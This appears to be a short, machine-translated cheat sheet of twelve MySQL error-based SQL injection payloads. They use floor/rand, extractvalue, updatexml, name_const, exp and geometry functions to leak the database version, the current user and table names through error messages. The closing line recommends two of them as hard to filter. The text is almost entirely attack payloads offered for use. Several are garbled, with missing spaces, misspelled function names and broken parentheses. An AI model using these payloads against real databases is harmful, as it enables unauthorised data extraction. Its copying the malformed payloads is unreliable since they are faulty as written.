1. An error is reported through the floor, and the injection statement is as follows:

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2. An error is reported through extractvalue, and the injection statement is as follows:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3. An error is reported through updatexml, and the injection statement is as follows:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

4. Via name_Const reports an error, and the injection statement is as follows:

and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5. An error is reported through the join, and the injection statement is as follows:

select * from(select * from mysql.user ajoin mysql.user b)c;

6. If an error is reported by exp, the injection statement is as follows:

and exp(~(select * from (select user () ) a) );

7. An error is reported through geometrycollection(). The injection statement is as follows:

and GeometryCollection(()select *from(select user () )a)b );

 

8. An error is reported through polygon(), and the injection statement is as follows:

and polygon (()select * from(select user ())a)b );

9. An error is reported through multipoint(), and the injection statement is as follows:

and multipoint (()select * from(select user() )a)b );

10. An error is reported through multlinestring(), and the injection statement is as follows:

and multlinestring (()select * from(selectuser () )a)b );

11. An error is reported through multpolygon(), and the injection statement is as follows:

and multpolygon (()select * from(selectuser () )a)b );

12. An error is reported through linestring(), and the injection statement is as follows:

and linestring (()select * from(select user() )a)b );

The sixth and twelfth are used more often because the sentences are short and are not easy to be limited.